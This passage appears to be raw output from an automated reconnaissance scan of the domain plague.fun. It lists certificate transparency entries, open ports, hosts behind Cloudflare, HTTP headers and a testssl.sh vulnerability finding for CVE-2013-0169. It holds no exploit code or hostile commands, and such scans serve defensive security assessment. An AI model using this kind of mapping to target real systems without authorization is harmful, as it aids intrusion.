u'MIIEVjCCAz6gAwIBAgISBNDRocx8IO3rAfyF3UXM5RvaMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjEwMjMxNTM4MThaFw0yMzAxMjExNTM4MTdaMBkxFzAVBgNVBAMTDmFwaS5wbGFndWUuZnVuMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMMC/IqADl3zzjBcMU4AgtPYTI7nvNYlE8OL8SA32TvsrUG7+0OMfXUuJn5xjMwQLCUKG7wInaDr6Zq16HEvl8aOCAkgwggJEMA4GA1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUBONyUoTZR/+nJYu+VSpNWYbfPnUwHwYDVR0jBBgwFoAUFC6zF7dYVsuuUAlA5h+vnYsUwsYwVQYIKwYBBQUHAQEESTBHMCEGCCsGAQUFBzABhhVodHRwOi8vcjMuby5sZW5jci5vcmcwIgYIKwYBBQUHMAKGFmh0dHA6Ly9yMy5pLmxlbmNyLm9yZy8wGQYDVR0RBBIwEIIOYXBpLnBsYWd1ZS5mdW4wTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYQFtZtpAAAEAwBHMEUCIQCp3T4ZPQhHX5uxkKvCreKRBe/vlZkjnhK7GMXymCx//wIgMGlCijQYaOjh9OTZlM/FNO85GkPZnEeOQRAsbzog4+EAdQDoPtDaPvUGNTLnVyi8iWvJA9PL0RFr7Otp4Xd9bQa9bgAAAYQFtZ1UAAAEAwBGMEQCIFi5sYzNQ9YdgzwRA2cobKEzU7a50+9wrCxVWHEuhmu1AiB54W4Deh0nyc+IfwonG6yh/P/R62Of8KKD8IxDfTWVPjANBgkqhkiG9w0BAQsFAAOCAQEAs44OGJMOyxSFUzhjucTA1+RO3J0SeokML5goUniRJw+Uwfr+ED26aYqyeMWtJLrSnrJVbUW0c1RJSb/HGQRS1OGT/Ji3l3x/JlVCg+/8S9gy5/vMqzwU78dv40X/U8qSmeEc0iMpIUpT0CQ+/8vfD+/GmZS/bmRvNtn9ucgNYGuWm8OVYD0WbBa4y3pYDK/jUGDKK6Fyq/6z/27Nr41LkMSbRcvAhqz9R63dqxadgJ0shE7HvWEvfNzptezdaOsuakuFTzXeF3852qXn8w8DqFp8F4cZ4ISEAj00cIOKkg1Bz9LNTkVo8EzBtEbqE1FSIyLdujanMpJ2t2jeerj7vg==', u'sha256': u'3e85be100bffaa41aba2e11a1f798d83d44538d9ccd62a4edf68e383abdb3c4e', u'type': u'cert'}, u'dns_names': [u'api.plague.fun'], u'tbs_sha256': u'c68f89fe15d40f6e1cfc21d38eedd5936a57e9846f1840a1f7adc96484fd86c8', u'not_before': u'2022-10-23T15:38:18Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'9e725d321f7afc5c13793aed856285bb5b34c5a83ecc628871afaf31ed38b6bc', u'revoked': False, u'not_after': u'2023-01-28T18:19:30Z', u'id': u'4359905513', u'cert': {u'data': u'MIIDvzCCA0WgAwIBAgISBGvFWhyq3hElOoWsJ0ashMKpMAoGCCqGSM49BAMDMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJFMTAeFw0yMjEwMzAxODE5MzFaFw0yMzAxMjgxODE5MzBaMBcxFTATBgNVBAMMDCoucGxhZ3VlLmZ1bjBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABAEBbjB3S0p2vpeUPtevu4n+n8ny6O3UE2p0u1R5uCdtkAHgvl356GE+044TC8DjuemBO9bRgFBqDoDi57zV7FujggJUMIICUDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFOks2DhNp65+0tsMaYmxBrJwu6AOMB8GA1UdIwQYMBaAFFrz7Sv8NsI3eblSMOpUb89Vyy6sMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL2UxLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vZTEuaS5sZW5jci5vcmcvMCMGA1UdEQQcMBqCDCoucGxhZ3VlLmZ1boIKcGxhZ3VlLmZ1bjBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQUGCisGAQQB1nkCBAIEgfYEgfMA8QB3AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhCpVuOkAAAQDAEgwRgIhAMJuUTZZDc5OPpNot1LsDaNkK/3DxIwpVkhvldibzER+AiEAorJ1vhPs3Xbqlh8qbG4OKYKAFz5HnI6S5WWTxPJAmnEAdgB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYQqVbphAAAEAwBHMEUCIFgJ4nVECWUjsuiY5lopVGGClUYAzEzw+XXCP6Ugvlz9AiEAvDcNUHv8YqBTy+O8kx169ydh7v2mIuK3XJySXbSWJ0MwCgYIKoZIzj0EAwMDaAAwZQIwBCGZwWIYvZklmPMMys7I+i8qMbnqspkQ5lf1oyM+SnpsG30cRPwD4Bu5EmMqF+ArAjEAgvfOrPVVk4rsqI4WJVzZXejXxshVYhGViGo0EJ6eYHyjCskvJLQ7fGSyTNoo/bdE', u'sha256': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'type': u'cert'}, u'dns_names': [u'*.plague.fun', u'plague.fun'], u'tbs_sha256': u'8f1429103c47de6d147ec80069f42bf0414cf5b0a220f075e16f3573d47cb42d', u'not_before': u'2022-10-30T18:19:31Z', u'issuer': {u'pubkey_sha256': u'276fe8a8c4ec7611565bf9fce6dcace9be320c1b5bea27596b2204071ed04f10', u'name': u"C=US, O=Let's Encrypt, CN=E1"}}, {u'pubkey_sha256': u'0ea98ff70d97728c7d75c56641910e1b9453f50c52bce53928d3c5ca76c630da', u'revoked': False, u'not_after': u'2023-01-28T20:43:45Z', u'id': u'4360219490', u'cert': {u'data': u'MIIEdTCCA12gAwIBAgIQSCBA6RFsRvwTyMaRlabRmzANBgkqhkiG9w0BAQsFADBGMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzETMBEGA1UEAxMKR1RTIENBIDFQNTAeFw0yMjEwMzAyMDQzNDZaFw0yMzAxMjgyMDQzNDVaMBcxFTATBgNVBAMMDCoucGxhZ3VlLmZ1bjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALrhcrXJXlXdiAvXNFeY4NW4DihhJe76rMJzh8Wd/u8I+QCo+Cam8RubtY/Z/GPtmpCTnVJNcQEYghdbYaJ1IZuynv5bvpxdGHWXVQho9WdohgbpW7VCS0j27gULmWLIqHTgTnBLdIOuVbMBoH+Ocu5b+XSXRYj2dpenwuIhdAJdjkFgIXNLXcDBo8RYJDSP4zTdz8nw4qBHh9cpNERA0T9Vg+rdZ1l6MFABw7bzssoFHbPrrmG39BOUkKC2VNYgFuUB6IO0KubwxcuKKT2JfEl6oJBj948z+c60ft/YFouDRcAOFQEDHv2aelXXZKc5uoUswoEPTFKSIYHtAvjcgm8CAwEAAaOCAYwwggGIMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBSNjMz0ghHh/jiMeolM+1HGJjOSVjAfBgNVHSMEGDAWgBTV/J4N3x7K3QiXl24rxV/FK/XsuDB4BggrBgEFBQcBAQRsMGowNQYIKwYBBQUHMAGGKWh0dHA6Ly9vY3NwLnBraS5nb29nL3MvZ3RzMXA1L041UEtrdlNERXNFMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxcDUuZGVyMCMGA1UdEQQcMBqCDCoucGxhZ3VlLmZ1boIKcGxhZ3VlLmZ1bjAhBgNVHSAEGjAYMAgGBmeBDAECATAMBgorBgEEAdZ5AgUDMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmxzLnBraS5nb29nL2d0czFwNS9seUhOTEhvMWVsay5jcmwwEwYKKwYBBAHWeQIEAwEB/wQCBQAwDQYJKoZIhvcNAQELBQADggEBAEqADiYv0s220Q0ZxLs3vEYVG/W9kefFm1ylJjVi6Ewlj2ArLERhIPpaxU/9oeoq3iQPkGHNkbx8r/3n+R5qlCXyxtibqBhzzP4ScQYpDPLHMQP/9zI2puAIxfM7FUuOrh23yqY5NboTEKDpNOBv1SNgHYtAq7XwSXqnFbZxhJSycwOrvfP6ByAFV+GYcKzie1EBxUPzawB6Pdf+E5mRvjuR152hoDkN4d8j0XRnCbc7QuahZHJOqNJjjYU5AszGv7MLNu1zXmKtu5xo9EcbJH0NFW0YrKqy3eeuLpsUbI8YIHN2oga48MH92yM3AdtxAp/WKiX8A88gEImEmves2+E=', u'sha256': u'e90fee33471e445f420dc6f027f4c54e500b881c2f610a9e165722ea988fac0e', u'type': u'precert'}, u'dns_names': [u'*.plague.fun', u'plague.fun'], u'tbs_sha256': u'837ecb87912fdd04bdfaa11a3792a9b8c2864a8c4fde87f5e44e6d4ee993b490', u'not_before': u'2022-10-30T20:43:46Z', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}, {u'pubkey_sha256': u'e7ddd456c999332466d993852c18852a3e330cfeb040adcdfdea0f94687eee82', u'revoked': False, u'not_after': u'2023-02-02T13:11:40Z', u'id': u'4379481732', u'cert': {u'data': u'MIIEWjCCA0KgAwIBAgISA/hAB6kqKfqV4l/q8ul1eVeOMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjExMDQxMzExNDFaFw0yMzAyMDIxMzExNDBaMBsxGTAXBgNVBAMTEGF0bGFzLnBsYWd1ZS5mdW4wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAATgMjdFfU0C+aoQ+tjoDynGCvkOgXaF9bmwpDYjBwAImWukfiGUjGB7CpXTio7g9c4Xb0KGCgtao+pBkmIPNilio4ICSjCCAkYwDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRQ23IOfyBN6eWHNMa20sjO4VsgjzAfBgNVHSMEGDAWgBQULrMXt1hWy65QCUDmH6+dixTCxjBVBggrBgEFBQcBAQRJMEcwIQYIKwYBBQUHMAGGFWh0dHA6Ly9yMy5vLmxlbmNyLm9yZzAiBggrBgEFBQcwAoYWaHR0cDovL3IzLmkubGVuY3Iub3JnLzAbBgNVHREEFDASghBhdGxhcy5wbGFndWUuZnVuMEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBAwYKKwYBBAHWeQIEAgSB9ASB8QDvAHUAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGEQvuuCAAABAMARjBEAiBhKSKsT3wwhtvLpWIadObwFwSQK9kEpdLaoorzqHxseQIgb0w40ZSYytDVEqq05B6itXCnp8T9ClK+fZoFZ4HQFgMAdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYRC+6/lAAAEAwBHMEUCIQC8jIXrv8Tw2IfkfppmlhVpd17y8W8+OErFdj4s3Brr0gIgYXiAu0BThwEXK1coKxKY0eLZkg2uLC1+gKH58yiU9Q0wDQYJKoZIhvcNAQELBQADggEBAIHJo8iQNZMqjBsfb+CRFolO2BazE3ag6nCTxHISpj33bAnZx5z8QNsRZvMXn5LhlDXAvrpuCb7dR+HWWMkO3pQgBPFUzgL7cFAxCaIek3ylBCilgVvIdaA6v7g7gaVvWqyZLQJIrC2hOvEGzVdM7eXpqBwlus5MzdtWIyFtzNwdQvEJ3Ciolq6822gRW89jkv2TNTPpUTB42Br9VCwHBAQZ+LJ1vO/xSFZBj2Sa8Ccd6zstaY0NDkVWMI5ul5NT1eFrtxz/AFjVB14i1s5PAtgstZ8uTFDUkJ0XmblUtuL4SZbo5Jw/sIcfISppqa2hla9oRZLIu5kX1PyQywXT2ms=', u'sha256': u'1e9cb916ccc4fd493f7420d2e58d07274fd1c30f24785e0b9764ffd07e7fc73f', u'type': u'cert'}, u'dns_names': [u'atlas.plague.fun'], u'tbs_sha256': u'0ec99f53bec04ae700149f53210a6fe7beefeec2222cbaf07f35cc974d41ae16', u'not_before': u'2022-11-04T13:11:41Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afad 2022-12-18 00:09:39 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.9:443 188.114.97.9 2022-12-18 00:09:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.8:443 188.114.96.0/24 2022-12-18 00:03:11 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.238 81.88.52.232 2022-12-18 00:09:45 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.9:80 188.114.96.9 2022-12-18 00:02:58 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:b5:ee:aa:9f:a9:bb:86:86:d8:5d:7e:c7:71:cb:57:b5:27 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Aug 24 16:36:10 2022 GMT Not After : Nov 22 16:36:09 2022 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:49:59:ba:16:cf:70:69:e2:32:06:c9:70:ba:5f: a5:78:82:8c:0b:94:c3:eb:5e:23:37:b4:eb:a8:2c: 56:f9:0e:d7:d0:ab:6f:8e:d7:9d:b3:dc:4a:5d:40: 1b:4b:96:83:64:91:0b:8a:4b:d1:e0:17:cc:cb:25: 17:74:d8:2f:e5 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D4:FC:B1:AD:62:F6:65:B4:77:1D:8C:F3:26:59:20:33:E8:34:E2:7F X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption a7:18:19:be:f9:de:e2:92:fc:b4:2f:ff:09:38:1c:42:25:e6: 01:6c:d8:e8:c9:77:6a:41:20:d2:45:21:cf:f6:24:6e:28:1d: ac:28:50:d4:8a:0c:31:74:10:0c:07:40:e8:1a:d9:44:d5:3b: ac:91:71:d6:e0:98:69:40:a1:f7:fc:ef:bd:5e:7b:66:85:7a: ed:35:a3:82:d2:9e:37:a2:ca:bc:c1:cf:6e:5b:d9:04:ae:28: e8:a2:05:a4:f8:e3:e6:35:09:dd:9f:ee:c8:75:98:eb:4c:12: f1:d5:6d:dd:91:0e:ad:8a:24:08:b4:dd:ad:a3:f1:1c:53:9d: 5d:73:94:4a:55:70:02:39:e3:07:8a:2e:76:95:13:71:03:46: 83:7e:45:3a:de:ef:0e:b8:65:6a:ee:e6:68:37:d9:a6:49:3b: 23:98:f7:62:f7:19:9f:8f:7b:73:b9:fc:9d:0b:4a:39:d1:91: af:95:90:1a:28:f4:c4:05:48:21:17:b9:59:cb:7f:59:3c:6d: 8b:a7:ec:b8:2b:b3:2d:9b:4b:34:fd:56:65:b2:df:4b:28:3b: 51:a3:cd:23:5a:ff:7f:67:49:1b:a8:f1:3b:bf:7c:64:d5:7d: cf:24:50:67:d0:5b:2e:30:27:f6:a1:0b:de:54:13:2f:7a:de: 8e:67:a8:68 plague.fun 2022-12-18 00:20:56 Physical Location No Censys 0 0 2 0 None United States, North America 2606:4700:3031::ac43:93e6 2022-12-18 00:09:21 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b932660fdc442e6b1042', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Raccourcis personnalis\xe9s dans After Effects', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.ridcasib.gq', u'ridcasib.gq'], u'cn': u'*.ridcasib.gq', u'valid': True, u'not_after': u'2023-02-01T17:06:19Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'17f90ab081bda153ca6efb07f230a67a13d0390159eb20b845c1f8ccc7494904', u'key_algo': u'ECDSA', u'not_before': u'2022-11-03T17:06:20Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'ridcasib.gq', u'summary': u'Date: Thu, 03 Nov 2022 18:06:43 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=rH8ESsBQHTPWB3LJ9NCCkczLfKNPeprjF6hyQILMQmEzv4zCxsccXeVti9SA2Aa%2FkenoWQSMGTZ%2FV%2BcmZnJkipX0qRVJ8bBj4qpbozdEMEce4C6PN%2FuzBNbmq37dzA%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76470ba2cd16b8a3-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Raccourcis personnalis\xe9s dans After Effects', u'time': u'2022-11-03T18:06:43.482158627Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b932cce72124672d53fa', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Most viewed', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'nonsvooquaca.tk', u'summary': u'Date: Thu, 03 Nov 2022 16:49:11 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=w35ltoLfxmzU%2BLV0Iye9ADkcnmaLFoVg14AsLDdaYVQbu7Qcj9ZVhQ%2BUkPijYfYXTatno9IkxZkM2oOlyTVpqqS%2F5h%2BXEfPuLVAux5gwez0%2FN5SFcQ%2Frxox04ZtqWXjOBYY%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76469a0b9adf9b2b-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Most viewed', u'time': u'2022-11-03T16:49:10.866369244Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33f0c8df39b84175dbd6f0a150', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'MARCZ', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.marcz.com.mx', u'marcz.com.mx'], u'cn': u'*.marcz.com.mx', u'valid': True, u'not_after': u'2023-02-01T04:37:32Z', u'key_size': 2048, u'issuer_name': u'GTS CA 1P5', u'fingerprint': u'97cd9112488edfdbb7f554f8d890ab236c4f8f3c5e808dbc41f13a1fe5ff7608', u'key_algo': u'RSA', u'not_before': u'2022-11-03T04:37:33Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'marcz.com.mx', u'summary': u'Date: Thu, 03 Nov 2022 05:39:27 GMT\r\nContent-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: PHPSESSID=nfmq3diji9aonqg43vvffqu9ir; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nX-Site-Id: 5a4513c5ff7b5bbaf5ca0c3ad06b4d5df99f78975c669a9bf5b4cdc05b2f5348646fa0f7\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=wXDmH9082163r28PZeFy9gRTW2AyL4ZcMyNktkZu0bQxzverweXV18f2vYnQOOlmJFhAv5HIOIv%2F2K5ZC6QVRXT%2FFJw23JnqX2ibiOuDGL47D2cY7FP9LO76Q9Z8cE8%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 7642c4fe2921dd71-LHR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: MARCZ', u'time': u'2022-11-03T05:39:26.397484659Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b9328d20ff915a7cd725', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Best Ardooie Belgium gay dating site', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'drawasbasmamis.ml', u'sni.cloudflaressl.com', u'*.drawasbasmamis.ml'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-09-04T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'1b4fde192766931f3a23145b88a1f9838dfdc810fe500c0d2122b62f4d75660f', u'key_algo': u'ECDSA', u'not_before': u'2022-09-04T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'drawasbasmamis.ml', u'summary': u'Date: Wed, 02 Nov 2022 07:40:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=U7V%2B5YAFbuATxcyWS%2Bu7ZtCsGQJMrgtC7HcQmAYwqqNFyee7UkdeSw0Y4i5TqMIed2%2FDbJhYWWjJr78BFFlXMp%2BU%2BBOJ11HPWXMVeXWA5oK9iZmqVEALUK4YVT8sHxdEN0Fq5Q%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","m 104.21.7.179 2022-12-18 00:14:36 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) 